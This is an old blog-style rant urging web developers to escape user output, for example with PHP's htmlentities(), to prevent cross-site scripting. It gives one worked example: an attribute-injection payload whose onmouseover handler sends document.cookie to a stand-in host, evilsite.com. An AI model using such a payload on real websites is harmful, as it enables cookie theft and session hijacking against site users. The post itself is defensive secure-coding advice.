2009-05-03 00:05:20

Fri, 28 Nov 08 18:33:25 -0700

Ok, do I have your attention? Good.

Stop it. Just. Stop. It.

About 70% (from my experience) of websites have an XSS hole somewhere. I Really don't understand how hard it is to use the htmlentities() function in PHP.
or Server.HtmlEncode() in ASP.
Or any of the numerous such functions in perl, JSP, SSJS, or anything you chose.

Google it.

The problem is, when for whatever reason, the user's input is outputted to a page. Such as 'Your Query, "duhduhduh" returned 0 results.'

Or the data outputted to a title tag, or an input tag, or worked with via script, or ANYWHERE on a page where the data might be outputted.


Please, I have seem literally hundreds of sites do some overly complicated series of filters and dynamic outputs, all of which are useless.

It only takes one single output to leave a page vulnerable to non-persistent XSS.

Case in point:
TheOnion.com recently fixed an XSS vulnerability caused by not escaping quotes in a text input. They used strip_tags(), so they thought they were safe.
Close, but no cigar.

A search engine injection of
" style="position:absolute;top:0;left:0;height:100%;width:100%;z-index:10;" onmouseover="document.location='http://evilsite.com/logger.php?cookie='+document.cookie;

Would result in cookie theft, redirection to [insert malicious site here], or any number of browser hijacking attacks.

All due to the failure to escape one character. The double quote (").

For the love of all that is holy, just use htmlentities() and avoid massive cost and down time.

DO NOT use complicated filters or functions.

DO NOT filter the output differently for different parts of the page.

DO NOT pay an overpriced web developer tens of thousands of dollars to build a website, if he has no clue about security.

Hint: several of the Alexa top 100 sites are vulnerable to non-persistent XSS in the search engine.

This is a very good article on XSS

Just fix it!